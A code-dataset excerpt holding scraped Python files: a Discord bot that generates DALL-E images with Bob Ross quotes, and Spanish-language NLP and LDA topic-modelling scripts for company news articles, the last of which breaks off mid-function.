date_collected | repo_name | file_name | file_contents | prompts
---|---|---|---|---|
2024-01-10 | mclazarus/bot_ross | bot_ross.py | import datetime
import asyncio
import aiohttp
import discord
import os
import json
from datetime import datetime
from discord.ext import commands
import openai
import random
import logging
import coloredlogs
import base64
import io
import string
import re
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("bot_ross")
coloredlogs.install(level='INFO', logger=logger, milliseconds=True)
# Load OpenAI API key and Discord bot token from environment variables
openai.api_key = os.environ['OPENAI_API_KEY']
DISCORD_BOT_TOKEN = os.environ['DISCORD_BOT_TOKEN']
# Configuration
LIMIT = int(os.environ.get('API_LIMIT', 100))
DATA_FILE = "data/request_data.json"
intents = discord.Intents.default()
intents.guilds = True
intents.messages = True
intents.presences = True
intents.message_content = True
bot = commands.Bot(command_prefix='&', intents=intents)
start_time = datetime.now()
def load_data():
if os.path.exists(DATA_FILE):
with open(DATA_FILE, 'r') as f:
return json.load(f)
return {}
def save_data(data):
with open(DATA_FILE, 'w') as f:
json.dump(data, f)
def get_current_month():
return datetime.now().strftime("%Y-%m")
@bot.event
async def on_ready():
logger.info(f'{bot.user.name} has connected to Discord!')
@bot.command(name='ping', help='Check for bot liveness and latency. (ms)')
async def ping(ctx):
await ctx.send(f'Pong! {round(bot.latency * 1000)}ms')
@bot.command(name='natpaint', help='Paint a picture based on a prompt. Using the natural style. monthly limit')
async def natpaint(ctx, *, prompt):
logger.info(f"Received request from {ctx.author.name} to paint: {prompt} with natural style")
current_month = get_current_month()
data = load_data()
if current_month not in data:
data[current_month] = 0
if data[current_month] >= LIMIT:
await ctx.send("Monthly limit reached. Please wait until next month to make more paint requests.")
return
quote = get_random_bob_ross_quote()
await ctx.send(f"{quote}")
file_name = await generate_file_name(prompt)
try:
image_b64 = await fetch_image(prompt, "natural")
image_data = base64.b64decode(image_b64)
image_file = io.BytesIO(image_data)
await ctx.send(file=discord.File(image_file, file_name, description=f"{prompt}"))
data = load_data()
if current_month not in data:
data[current_month] = 0
data[current_month] += 1
save_data(data)
await ctx.send(f"Current Monthly requests: {data[current_month]}")
except Exception as e:
await ctx.send(f"No painting for: {prompt}, exception for this request: {e}")
@bot.command(name='paint', help='Paint a picture based on a prompt. monthly limit')
async def paint(ctx, *, prompt):
logger.info(f"Received request from {ctx.author.name} to paint: {prompt}")
current_month = get_current_month()
data = load_data()
if current_month not in data:
data[current_month] = 0
if data[current_month] >= LIMIT:
await ctx.send("Monthly limit reached. Please wait until next month to make more paint requests.")
return
quote = get_random_bob_ross_quote()
await ctx.send(f"{quote}")
file_name = await generate_file_name(prompt)
try:
image_b64 = await fetch_image(prompt)
image_data = base64.b64decode(image_b64)
image_file = io.BytesIO(image_data)
await ctx.send(file=discord.File(image_file, file_name, description=f"{prompt}"))
# reload the data for the increment since we are async
data = load_data()
if current_month not in data:
data[current_month] = 0
data[current_month] += 1
save_data(data)
await ctx.send(f"Current Monthly requests: {data[current_month]}")
except Exception as e:
await ctx.send(f"No painting for: {prompt}, exception for this request: {e}")
async def fetch_image(prompt, style="vivid"):
async with aiohttp.ClientSession() as session:
for _ in range(2):
async with session.post(
"https://api.openai.com/v1/images/generations",
headers={
"Authorization": f"Bearer {openai.api_key}",
"Content-Type": "application/json"
},
json={
"model": "dall-e-3",
"prompt": prompt,
"n": 1,
"size": "1024x1024",
"quality": "hd",
"style": style,
"user": "bot_ross",
"response_format": "b64_json",
},
) as response:
if response.status == 200:
data = await response.json()
logger.info(f"Request: {prompt} Success")
return data["data"][0]["b64_json"]
else:
error_json = await response.json()
if "error" in error_json:
error_message = error_json["error"]["message"]
else:
error_message = await response.text()
if response.status in [429, 500, 503]:
logger.error(f"Request: {prompt} Trying again. Error: {response.status} {error_message}")
await asyncio.sleep(5)
elif response.status == 400:
logger.info(f"Request: {prompt} Safety Violation.")
data = load_data()
if 'safety_trips' not in data:
data['safety_trips'] = 0
data['safety_trips'] += 1
save_data(data)
else:
logger.error(f"Request: {prompt} Error: {response.status}: {error_message}")
raise Exception(f"response: {response.status}: {error_message}")
async def generate_file_name(prompt):
# replace all special characters with _
file_name = re.sub(r'[^0-9a-zA-Z]', '_', prompt)
# limit size of string to 50 characters
file_name = file_name[:50]
# tack on a random bit of data to the end of the file name to avoid collisions
# Define the characters that can be used in the string
characters = string.ascii_letters + string.digits
# Generate a random 6-character string
random_string = ''.join(random.choice(characters) for i in range(6))
file_name = f"{file_name}_{random_string}.png"
return file_name
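# Illustrative example (values are made up): generate_file_name("A happy little tree!")
# would return something like "A_happy_little_tree__x9Qk2M.png" -- non-alphanumeric
# characters become "_", the prompt is capped at 50 characters, and the random
# 6-character suffix avoids filename collisions.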
@bot.command(name='stats', help='Check monthly stats. (limit, requests)')
async def stats(ctx):
current_month = get_current_month()
data = load_data()
if current_month not in data:
data[current_month] = 0
if 'safety_trips' not in data:
data['safety_trips'] = 0
uptime_in_hours = (datetime.now() - start_time).total_seconds() / 3600
await ctx.send(f"Uptime: {uptime_in_hours:.2f} hours\nMonthly limit: {LIMIT}\nMonthly requests: {data[current_month]}\nSafety Violations: {data['safety_trips']}")
def get_random_bob_ross_quote():
quotes = [
"We don't make mistakes, just happy little accidents.",
"Talent is a pursued interest. Anything that you're willing to practice, you can do.",
"There's nothing wrong with having a tree as a friend.",
"You too can paint almighty pictures.",
"In painting, you have unlimited power.",
"I like to beat the brush.",
"You can do anything you want to do. This is your world.",
"The secret to doing anything is believing that you can do it.",
"No pressure. Just relax and watch it happen.",
"All you need to paint is a few tools, a little instruction, and a vision in your mind.",
"Just let go — and fall like a little waterfall.",
"Every day is a good day when you paint.",
"The more you do it, the better it works.",
"Find freedom on this canvas.",
"It's life. It's interesting. It's fun.",
"Believe that you can do it because you can do it.",
"You can move mountains, rivers, trees — anything you want.",
"You can put as many or as few highlights in your world as you want.",
"The more you practice, the better you get.",
"This is your creation — and it's just as unique and special as you are."
]
return random.choice(quotes)
bot.run(DISCORD_BOT_TOKEN)
| [] |
2024-01-10 | sicard6/ACNCustomerAnalysis | Medios_Comunicacion~NLP_Analitycs~Scripts~NLP.py | # %%
# Librerías
from gensim.corpora.dictionary import Dictionary
from gensim.models import CoherenceModel
from gensim.models import LdaMulticore
import pandas as pd
import spacy
import nltk
import json
import os
# %% Funciones
def procesamiento(columna: str, df: pd.DataFrame):
"""Función para procesar el texto y obtener columnas tokenizada y radicalizada
Args:
columna (str): columna a procesar
df (pd.DataFrame): dataframe en donde se encuentra el texto a procesar
Returns:
pd.DataFrame: Data Frame con columna procesada
"""
# Modelo de spacy que se utilizará
# spacy.cli.download('es_core_news_md')
es = spacy.load('es_core_news_md')
# Etiquetas a remover del texto lematizado
removal = ['ADV', 'PRON', 'CCONJ', 'PUNCT',
'PART', 'DET', 'ADP', 'SPACE', 'NUM', 'SYM']
# Convertir a objeto spaCy
aux = df[columna].str.lower().apply(es)
# Tokenización
df[f'{columna} procesado'] = aux.apply(
lambda x: [token for token in x])
# Normalización (minuscula, tamaño > 3 y solo letras)
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if len(token) > 3 and token.is_alpha])
# Remover stopwords (combinación de contexto y spacy).
# Convertir Token a str
with open('/Users/'+os.getlogin()+'/OneDrive - Accenture/ACNCustomerAnalysis/NLP_Analitycs/Scripts/sw_es.txt', 'r', encoding='utf-8') as file:
stop_words_contexto = {line.split(None, 1)[0] for line in file}
es.Defaults.stop_words |= stop_words_contexto
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if not token.is_stop])
# Segmentación en oraciones
df[f'{columna} segmentado'] = aux.apply(
lambda x: ", ".join([segment.orth_ for segment in x.sents]))
# Extracción de entidades
df[f'Entidades de {columna}'] = aux.apply(
lambda x: ", ".join([ent.text for ent in x.ents]))
# Radicalización (stemming)
stemmer = nltk.SnowballStemmer('spanish')
df[f'{columna} radicalizado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([stemmer.stem(token.orth_) for token in x]))
# Lemmatization
df[f'{columna} lematizado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([token.lemma_ for token in x if token.pos_ not in removal]))
# Procesado a string
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([token.orth_ for token in x]))
def lista_ngramas(val_ent: str, val_pal: str, indice: int, n: int):
"""Función que genera la lista de todas las palabras del conjunto
de datos con la frecuencia de cada una por artículo,
especifica a que artículo pertenece y si es una entidad (1) o no
(0).
Args:
val_ent (str): cadena de entidades obtenida en el procesamiento
val_pal (str): cadena de palabras obtenida en el procesamiento
indice (int): indice del artículo al que corresponden las cadenas
n (int): tamaño de la subsecuencia del n-grama
Returns:
pd.DataFrame: DataFrame con el indice, la palabra, frecuencia de
aparición, ID del artículo al que pertenece. Si es solo una palabra
se incluye la columna de entidad que indica si lo es o no
"""
# Verificar si existen entidades
if type(val_ent) == float:
entidades = {}
else:
entidades = set(val_ent.split(', '))
palabras = val_pal.split(', ')
ngrams = list(nltk.ngrams(palabras, n))
freq_pal = dict(nltk.FreqDist(ngrams))
if n == 1:
lista = []
for key, value in freq_pal.items():
word = ", ".join(list(key))
if word in entidades:
lista.append([word, value, indice, 1])
else:
lista.append([word, value, indice, 0])
df_frec = pd.DataFrame(
lista, columns=['Palabra', 'Frecuencia', 'ID_Articulo', 'Entidad'])
else:
lista = []
for key, value in freq_pal.items():
lista.append([", ".join(list(key)), value, indice])
df_frec = pd.DataFrame(
lista, columns=['Palabra', 'Frecuencia', 'ID_Articulo'])
df_frec.index.name = 'ID_Token'
return df_frec
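# Illustrative example (hypothetical values): lista_ngramas("Ecopetrol",
# "reservas, Ecopetrol, reservas", 7, 1) returns a DataFrame with the rows
# ("reservas", 2, 7, 0) and ("Ecopetrol", 1, 7, 1) -- unigram frequency per
# article plus an entity flag; for n > 1 the Entidad column is omitted.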
def asignar_industrias(df: pd.DataFrame):
"""Función para asignar las industrias a cada artículo según de la empresa
de la que se esta hablando
Args:
df (pd.DataFrame): DataFrame a asignarle la columna Industria
"""
with open('/Users/'+os.getlogin()+'/OneDrive - Accenture/ACNCustomerAnalysis/Web_Scraping/config.json', encoding='utf-8-sig') as f:
data = json.load(f)
dic_ind = {}
for i in data['industrias']:
for j in i['Empresas']:
dic_ind[j] = i['industria']
df['Industria'] = df['Empresa'].apply(lambda x: dic_ind[x])
# %% LECTURA Y PREPARACIÓN DE LOS DATOS
path = 'C:/Users/'+os.getlogin() + \
'/OneDrive - Accenture/ACNCustomerAnalysis/Medios_Comunicacion'
# LEER ARCHIVOS CON DATOS
df_raw = pd.read_csv(path+'/data/raw/database.csv',
encoding='utf-8-sig', index_col=[0])
df_curated = pd.read_csv(
path+'/data/curated/curated_database.csv', encoding='utf-8-sig', index_col=[0])
# Verificar cuales articulos no han sido procesados
df = df_raw[~df_raw['Titulo'].isin(df_curated['Titulo'])]
# %%
if len(df) > 0:
# Estandarización formato fechas
df['Contenido'] = df['Contenido'].str.replace(
'\r|\n|\f|\v', ' ')
df['Titulo'] = df['Titulo'].str.replace('\r|\n|\f|\v', ' ')
df['Resumen'] = df['Resumen'].str.replace('\r|\n|\f|\v', ' ')
df['Autor'] = df['Autor'].str.replace('\r|\n|\f|\v', ' ')
df['Fecha Publicacion'] = pd.to_datetime(
df['Fecha Publicacion']).dt.strftime('%d-%m-%Y')
df['Fecha Extraccion'] = pd.to_datetime(
df['Fecha Extraccion']).dt.strftime('%d-%m-%Y')
# ELIMINACIÓN COLUMNAS Y FILAS NO RELEVANTES
# Eliminar filas sin información en la columna Contenido
df = df.drop(df[df['Contenido'] == "SIN PARRAFOS"].index).reset_index(
drop=True)
df = df.drop(df[df['Contenido'].isna()].index).reset_index(drop=True)
df = df.drop(df[df.Contenido.str.len() < 500].index).reset_index(drop=True)
# Eliminar aquellos artículos que no tengan la empresa en su contenido y reemplazar los bigramas
empresas = df['Empresa'].unique()
no_cont = []
for emp in empresas:
df_empresa = df[df['Empresa'] == emp]
df_empresa['Contenido'] = df_empresa['Contenido'].str.lower()
if emp == 'Grupo Exito':
# Guardar aquellos que no contengan a la empresa en su contenido
emp = 'Éxito'
no_cont += df_empresa[~df_empresa['Contenido']
.str.contains(emp.lower())].index.to_list()
# Reemplazar el espacio _ para considerar el bigrama
df['Contenido'] = df['Contenido'].str.replace(
'Grupo Éxito', 'Grupo_Exito')
df['Contenido'] = df['Contenido'].str.replace(
'Éxito', 'Grupo_Exito')
elif ' ' in emp:
# Guardar aquellos que no contengan a la empresa en su contenido
aux = emp.split()[1]
no_cont += df_empresa[~df_empresa['Contenido']
.str.contains(aux.lower())].index.to_list()
# Reemplazar el espacio _ para considerar el bigrama
df['Contenido'] = df['Contenido'].str.replace(
emp, emp.replace(' ', '_'))
df['Contenido'] = df['Contenido'].str.replace(
aux, emp.replace(' ', '_'))
else:
# Guardar aquellos que no contengan a la empresa en su contenido
no_cont += df_empresa[~df_empresa['Contenido']
.str.contains(emp.lower())].index.to_list()
df = df.drop(no_cont).reset_index(drop=True)
# %%
procesamiento('Contenido', df)
df_palabras = pd.DataFrame()
df_bigramas = pd.DataFrame()
df_trigramas = pd.DataFrame()
len_df = len(df)
len_curated = len(df_curated)
for i in range(len_curated, len_curated + len_df):
aux_palabras = lista_ngramas(df.loc[i - len_curated, 'Entidades de Contenido'],
df.loc[i - len_curated, 'Contenido procesado'], i, 1)
df_palabras = pd.concat([df_palabras, aux_palabras], ignore_index=True)
aux_bigramas = lista_ngramas(df.loc[i - len_curated, 'Entidades de Contenido'],
df.loc[i - len_curated, 'Contenido procesado'], i, 2)
df_bigramas = pd.concat([df_bigramas, aux_bigramas], ignore_index=True)
aux_trigramas = lista_ngramas(df.loc[i - len_curated, 'Entidades de Contenido'],
df.loc[i - len_curated, 'Contenido procesado'], i, 3)
df_trigramas = pd.concat([df_trigramas, aux_trigramas], ignore_index=True)
df_curated = pd.concat([df_curated, df], ignore_index=True)
# Eliminar Aquellos con titulos repetidos
df_curated = df_curated[~df_curated['Titulo'].duplicated()
].reset_index(drop=True)
df_curated = df_curated[~df_curated['Fecha Publicacion'].isna()].reset_index(
drop=True)
df_curated.index.name = 'ID_Articulo'
df_curated.to_csv(path+'/data/curated/curated_database.csv',
encoding='utf-8-sig')
palabras_csv = pd.read_csv(
path+'/data/curated/palabras.csv', encoding='utf-8-sig', index_col=[0])
df_palabras = pd.concat([palabras_csv, df_palabras], ignore_index=True)
df_palabras.to_csv(path+'/data/curated/palabras.csv', encoding='utf-8-sig')
bigramas_csv = pd.read_csv(
path+'/data/curated/bigramas.csv', encoding='utf-8-sig', index_col=[0])
df_bigramas = pd.concat([bigramas_csv, df_bigramas], ignore_index=True)
df_bigramas.to_csv(path+'/data/curated/bigramas.csv', encoding='utf-8-sig')
trigramas_csv = pd.read_csv(
path+'/data/curated/trigramas.csv', encoding='utf-8-sig', index_col=[0])
df_trigramas = pd.concat([trigramas_csv, df_trigramas], ignore_index=True)
df_trigramas.to_csv(path+'/data/curated/trigramas.csv', encoding='utf-8-sig')
# topicos(df_curated, 'Contenido')
# %%
| [] |
2024-01-10 | sicard6/ACNCustomerAnalysis | Medios_Comunicacion~NLP_Analitycs~Legacy_Code~NLP.py | #In[]:
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import spacy
import pyLDAvis.gensim_models
pyLDAvis.enable_notebook()# Visualise inside a notebook
import es_dep_news_trf
from gensim.corpora.dictionary import Dictionary
from gensim.models import LdaMulticore
from gensim.models import CoherenceModel
semanaRaw=pd.read_csv(r'C:\Users\nicolas.gomez.garzon\OneDrive - Accenture\Desktop\NLP\ACNCustomerAnalysis\data\raw\semana.csv')
print(semanaRaw.info())
semanaRaw=semanaRaw[semanaRaw['Empresa']=='Ecopetrol']
print(semanaRaw)
#In[]:
# Our spaCy model:
nlp = es_dep_news_trf.load()
removal= ['ADV','PRON','CCONJ','PUNCT','PART','DET','ADP','SPACE', 'NUM', 'SYM']
tokens = []
for summary in nlp.pipe(semanaRaw['Resumen']):
proj_tok = [token.lemma_.lower() for token in summary if token.pos_ not in removal and not token.is_stop and token.is_alpha]
tokens.append(proj_tok)
semanaRaw['tokens'] = tokens
print(semanaRaw['tokens'])
#In[]:
dictionary = Dictionary(semanaRaw['tokens'])
dictionary.filter_extremes(no_below=1, no_above=0.7, keep_n=1000)
print(dictionary.values())
#In[]:
corpus = [dictionary.doc2bow(doc) for doc in semanaRaw['tokens']]
#In[]:
lda_model = LdaMulticore(corpus=corpus, id2word=dictionary, iterations=50, num_topics=3, workers = 4, passes=10)
#In[]:
topics = []
score = []
for i in range(1,20,1):
lda_model = LdaMulticore(corpus=corpus, id2word=dictionary, iterations=10, num_topics=i, workers = 4, passes=10, random_state=100)
cm = CoherenceModel(model=lda_model, texts = semanaRaw['tokens'], corpus=corpus, dictionary=dictionary, coherence='c_v')
topics.append(i)
score.append(cm.get_coherence())
_=plt.plot(topics, score)
_=plt.xlabel('Number of Topics')
_=plt.ylabel('Coherence Score')
plt.show()
#In[]:
lda_model = LdaMulticore(corpus=corpus, id2word=dictionary, iterations=100, num_topics=5, workers = 4, passes=100)
#In[]:
lda_model.print_topics(-1)
#In[]:
lda_display = pyLDAvis.gensim_models.prepare(lda_model, corpus, dictionary)
pyLDAvis.display(lda_display)
# %%
| [] |
2024-01-10 | sicard6/ACNCustomerAnalysis | Medios_Comunicacion~NLP_Analitycs~Scripts~Topicos.py | # Librerías
import os
import spacy
import nltk
import pyLDAvis.gensim_models
import pyLDAvis
from gensim.models import CoherenceModel
from gensim.models import LdaMulticore
# from gensim.models.ldamodel import LdaModel
from gensim.corpora.dictionary import Dictionary
import pandas as pd
import sys
# %%
# INCLUIR BIGRAMAS Y TRIGRAMAS EN EL DICCIONARIO PARA LOS TÓPICOS
base_path = os.getcwd()
path_medios = os.path.join(base_path, "Medios_Comunicacion")
# Importar documento a procesar
df = pd.read_csv(os.path.join(path_medios, "data", "curated", "curated_database.csv"),
encoding='utf-8-sig', index_col=[0])
# Hasta el momento la única columna procesada ha sido el Contenido
columna = 'Contenido'
# columna = sys[1]
# Filtro de bigramas de estructuras de tipo sustantivo
def bigram_filter(bigram):
"""Función para identificar si alguna palabra del bigrama es un sustantivo
Args:
bigram: Token etiquetado con su categoría gramatical
Returns:
bool: True si es un sustantivo
"""
tag = nltk.pos_tag(bigram)
if tag[0][1] not in ['JJ', 'NN'] and tag[1][1] not in ['NN']:
return False
if 'n' in bigram or 't' in bigram:
return False
if 'PRON' in bigram:
return False
return True
# Filtro de trigramas de estructuras de tipo sustantivo
def trigram_filter(trigram):
"""Función para identificar si alguna palabra del trigrama es un los sustantivos
Args:
bigram: Token etiquetado con su categoría gramatical
Returns:
bool: True si es un sustantivo
"""
tag = nltk.pos_tag(trigram)
if tag[0][1] not in ['JJ', 'NN'] and tag[1][1] not in ['JJ', 'NN']:
return False
if 'n' in trigram or 't' in trigram:
return False
if 'PRON' in trigram:
return False
return True
def replace_ngram(x, trigrams, bigrams):
"""FUnción para reemplazar las palabras por los bigramas o trigramas
Args:
x (str): String a ser reemplazado
Returns:
str: String con la modificación del bigrama o trigrama
"""
for gram in trigrams:
x = x.replace(gram, '_'.join(gram.split()))
for gram in bigrams:
x = x.replace(gram, '_'.join(gram.split()))
return x
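# Illustrative example (hypothetical n-gram lists): replace_ngram(
# "alianza del pacifico y grupo exito", trigrams=["alianza del pacifico"],
# bigrams=["grupo exito"]) returns "alianza_del_pacifico y grupo_exito".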
def procesamiento(columna: str, df: pd.DataFrame):
"""Función para procesar el texto y obtener columnas tokenizada y radicalizada
Args:
columna (str): columna a procesar
df (pd.DataFrame): dataframe en donde se encuentra el texto a procesar
Returns:
pd.DataFrame: Data Frame con columna procesada
"""
# Modelo de spacy que se utilizará
# spacy.cli.download('es_core_news_md')
es = spacy.load('es_core_news_md')
# Etiquetas a remover del texto lematizado
# Tags I want to remove from the text
removal = ['ADV', 'PRON', 'CCONJ', 'PUNCT',
'PART', 'DET', 'ADP', 'SPACE', 'NUM', 'SYM']
# Convertir a objeto spaCy
aux = df[columna].str.lower().apply(es)
# Tokenización
df[f'{columna} procesado'] = aux.apply(
lambda x: [token for token in x])
# Normalización (minuscula, tamaño > 3 y solo letras)
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if len(token) > 3 and token.is_alpha])
# Remover stopwords (combinación de contexto y spacy).
# Convertir Token a str
with open(os.path.join(path_medios, "NLP_Analitycs", "Scripts", "sw_es.txt"), 'r', encoding='utf-8') as file:
stop_words_contexto = {line.split(None, 1)[0] for line in file}
es.Defaults.stop_words |= stop_words_contexto
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if not token.is_stop])
# Segmentación en oraciones
df[f'{columna} segmentado'] = aux.apply(
lambda x: ", ".join([segment.orth_ for segment in x.sents]))
# Extracción de entidades
df[f'Entidades de {columna}'] = aux.apply(
lambda x: ", ".join([ent.text for ent in x.ents]))
# Radicalización (stemming)
stemmer = nltk.SnowballStemmer('spanish')
df[f'{columna} radicalizado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([stemmer.stem(token.orth_) for token in x]))
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token.text for token in x])
def procesamiento_ngrams(df: pd.DataFrame = df, columna: str = 'Contenido'):
df[f'{columna} lematizado'] = df[f'{columna} lematizado'].apply(
lambda x: x.replace('[', '').replace(']', '').replace('\'', '').split(', '))
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: x.replace('[', '').replace(']', '').replace('\'', '').split(', '))
dictionary = Dictionary(df[f'{columna} lematizado'])
# Filtrar los tokens de baja y alta frecuencia. Limitar el vocabulario
# a un máximo de 100 palabras
dictionary.filter_extremes(no_below=5, no_above=0.5)
# Contar el número de ocurrencias de cada palabra única
corpus = [dictionary.doc2bow(doc) for doc in df[f'{columna} lematizado']]
bigram_measure = nltk.collocations.BigramAssocMeasures()
finder = nltk.collocations.BigramCollocationFinder\
.from_documents(df[f'{columna} procesado'])
# Filtrar aquellos que ocurren al menos 50 veces
finder.apply_freq_filter(50)
bigram_scores = finder.score_ngrams(bigram_measure.pmi)
trigram_measure = nltk.collocations.TrigramAssocMeasures()
finder = nltk.collocations.TrigramCollocationFinder\
.from_documents(df[f'{columna} procesado'])
# Filtrar aquellos que ocurren al menos 50 veces
finder.apply_freq_filter(50)
trigram_scores = finder.score_ngrams(trigram_measure.pmi)
bigram_pmi = pd.DataFrame(bigram_scores)
bigram_pmi.columns = ['bigram', 'pmi']
bigram_pmi.sort_values(by='pmi', axis=0, ascending=False, inplace=True)
trigram_pmi = pd.DataFrame(trigram_scores)
trigram_pmi.columns = ['trigram', 'pmi']
trigram_pmi.sort_values(by='pmi', axis=0, ascending=False, inplace=True)
# Elija los 500 mejores ngramas, en este caso clasificados por PMI, que tengan estructuras similares a sustantivos.
filtered_bigram = bigram_pmi[bigram_pmi.apply(lambda bigram:
bigram_filter(
bigram['bigram'])
and bigram.pmi > 5, axis=1)][:500]
filtered_trigram = trigram_pmi[trigram_pmi.apply(lambda trigram:
trigram_filter(
trigram['trigram'])
and trigram.pmi > 5, axis=1)][:500]
bigrams = [' '.join(x) for x in filtered_bigram.bigram.values if len(
x[0]) > 2 or len(x[1]) > 2]
trigrams = [' '.join(x) for x in filtered_trigram.trigram.values if len(
x[0]) > 2 or len(x[1]) > 2 and len(x[2]) > 2]
reviews_w_ngrams = df.copy()
reviews_w_ngrams['Contenido'] = reviews_w_ngrams['Contenido'].apply(
lambda x: replace_ngram(x, trigrams, bigrams))
procesamiento('Contenido', reviews_w_ngrams)
reviews_w_ngrams.index.name = 'ID_Articulo'
return reviews_w_ngrams
# %%
# EXTRAER Y ASIGNAR TÓPICOS POR CLIENTES
def mejor_puntaje(topicos: list, puntaje_v: list):
"""Función para obtener el mejor puntaje según el criterio definido:
valor mas a la izquierda que sea >= 0.9 veces el puntaje máximo.
Solo se consideran entre 2 y 12 topicos para que se mantenga interpretable
el resultado
Args:
topicos (list): lista de enteros entre 2 y 12
puntaje_v (list): puntaje correspondiente al número de tópicos
Returns:
int: entero que indica el número de tópicos a considerar.
"""
puntaje_max = max(puntaje_v)
for n in range(len(puntaje_v)):
if puntaje_v[n] >= puntaje_max*(0.9):
break
return topicos[n]
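# Illustrative example (made-up scores): with topicos=[2, 3, 4, 5] and
# puntaje_v=[0.30, 0.42, 0.45, 0.44], the maximum is 0.45, the 90% cutoff is
# 0.405, and the left-most score above the cutoff is 0.42, so 3 topics are chosen.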
def n_topicos(df: pd.DataFrame, columna: str, corpus: list, diccionario: Dictionary, n_iterations: int = 10, n_workers: int = 4, n_passes: int = 10, n_random_state: int = 47, max_topicos: int = 12, min_topicos: int = 2):
"""Función para obter los puntajes de coherencia para cada uno de los números de tópicos considerados (entre 2 y 12).
Args:
df (pd.DataFrame): data frame donde se encuentran los textos a analizar
columna (str): columna en donde se encuentran los textos
corpus (list): vector con el id de la palabra y el número de ocurrencias
diccionario (Dictionary): colección de palabras de valores únicos de los diferentes textos considerados mapeado con su id
n_iterations (int, optional): número de iteraciones. Por defecto 10.
n_workers (int, optional): equivale al número de cores del computador. Por defecto 4.
n_passes (int, optional): número de veces que pasa por el corpus para entrenarse. Por defecto 10.
n_random_state (int, optional): semilla para un generador de números pseudoaleatorios. Por defecto 47.
max_topicos (int, optional): número máximo de tópicos a considerar. Por defecto 12.
min_topicos (int, optional): número mínimo de tópicos a considerar. Por defecto 2.
Returns:
int: número de tópicos a considerar en el modelo LDA
"""
topicos = []
# puntaje_umass = []
puntaje_v = []
for i in range(min_topicos, max_topicos + 1, 1):
lda_model = LdaMulticore(corpus=corpus, id2word=diccionario, iterations=n_iterations,
num_topics=i, workers=n_workers, passes=n_passes, random_state=n_random_state)
# lda_model = LdaModel(corpus=corpus, id2word=diccionario, iterations=n_iterations,
# num_topics=i, passes=n_passes, random_state=n_random_state)
# cm_umass = CoherenceModel(model=lda_model, corpus=corpus, dictionary=diccionario, coherence='u_mass')
cm_v = CoherenceModel(
model=lda_model, texts=df[f'{columna} lematizado'], corpus=corpus, dictionary=diccionario, coherence='c_v')
topicos.append(i)
# puntaje_umass.append(cm_umass.get_coherence())
puntaje_v.append(cm_v.get_coherence())
n = mejor_puntaje(topicos, puntaje_v)
return n
def modelo_lda(df: pd.DataFrame, columna: str, filtro_inf: int = 1, filtro_sup: float = 0.5, iteraciones: int = 50, workers: int = 4, passes: int = 10, n_palabras: int = None, n_random_state: int = 47):
"""Creación y ejecución del modelo LDA para la definición de tópicos y asignación de los mismos a los artículos
Args:
df (pd.DataFrame): dataframe que contiene los textos ya lematizados
columna (str): columna de la que se obtendrán los tópicos
filtro_inf (int, optional): número mínimo de apariciones de una palabra para ser considerada. Por defecto 1.
filtro_sup (float, optional): proporción máxima de artíulos en los que puede aparecer una palabra. Por defecto 0.2.
iteraciones (int, optional): número de iteraciones. Por defecto 50.
workers (int, optional): equivale al número de cores del computador. Por defecto 4.
passes (int, optional): número de veces que pasa por el corpus para entrenarse. Por defecto 10.
n_palabras (int, optional): número máximo de palabras a considerar en el diccionario. Por defecto None.
n_random_state (int, optional): semilla para un generador de números pseudoaleatorios. Por defecto 47.
Returns:
list, pd.DataFrame: lista de los tópicos y sus palabras correspondientes. Clasificación de los artículos por tema
"""
# El limite inferior se establece en 1 puesto que hay empresas con pocos artículos (2 en el caso de AES chivor)
# df[f'{columna} lematizado'] = df[f'{columna} lematizado'].apply(lambda x: x.replace('[', '').replace(']', '').replace('\'', '').split(','))
diccionario = Dictionary(df[f'{columna} lematizado'])
# diccionario.filter_extremes(no_below=filtro_inf, no_above=filtro_sup, keep_n=n_palabras)
corpus = [diccionario.doc2bow(doc) for doc in df[f'{columna} lematizado']]
n = n_topicos(df=df, columna=columna, corpus=corpus,
diccionario=diccionario)
lda_model = LdaMulticore(corpus=corpus, id2word=diccionario,
iterations=iteraciones, num_topics=n, workers=workers, passes=passes)
# lda_model = LdaModel(corpus=corpus, id2word=diccionario, iterations=iteraciones,
# num_topics=n, passes=passes, random_state=n_random_state)
topic_data = pyLDAvis.gensim_models.prepare(
lda_model, corpus, diccionario, mds='pcoa')
topicos = []
num_terms = 10 # Ajustar el número de palabras para representar cada tema
lambd = 0.6 # Ajústelo según el ajuste anterior
# Obtener las palabras que representa cada tópico
# Ajustar esto para reflejar el número de temas elegidos para el modelo LDA final
for i in range(1, n+1):
topic = topic_data.topic_info[topic_data.topic_info.Category ==
'Topic'+str(i)].copy()
topic['relevance'] = topic['loglift']*(1-lambd)+topic['logprob']*lambd
topicos.append([i, (", ".join(topic.sort_values(
by='relevance', ascending=False).Term[:num_terms].values))])
df['ID_Topico'] = [sorted(lda_model[corpus][text])[0][0]
for text in range(len(df[columna]))]
return topicos, df[['ID_Articulo', 'ID_Topico']]
def main():
reviews_w_ngrams = procesamiento_ngrams()
print('Corrio los ngramas')
# Guardar las palabras correspondientes a cada tópico
# y el tópico al que corresponde a cada artículo
topicos_general = {}
empresa_topicos = {}
empresas = reviews_w_ngrams['Empresa'].unique()
count = 0
for empresa in empresas:
df_aux = reviews_w_ngrams[reviews_w_ngrams['Empresa']
== empresa].reset_index()
topicos_general[empresa], empresa_topicos[empresa] = modelo_lda(
df=df_aux, columna='Contenido')
count += 1
print(count)
# Ajustar los números de los tópicos de 0 a n
for i in topicos_general.keys():
min_val = min(empresa_topicos[i]['ID_Topico'].unique())
if min_val > 1:
empresa_topicos[i]['ID_Topico'] = empresa_topicos[i]['ID_Topico'] - min_val + 1
# Ajustar los tópicos para que no se repitan entre empresas, dado que se
# obtienen individualmente
count = 0
topicos_mod = []
df_topicos = pd.DataFrame()
for i in topicos_general.keys():
aux = empresa_topicos[i].copy()
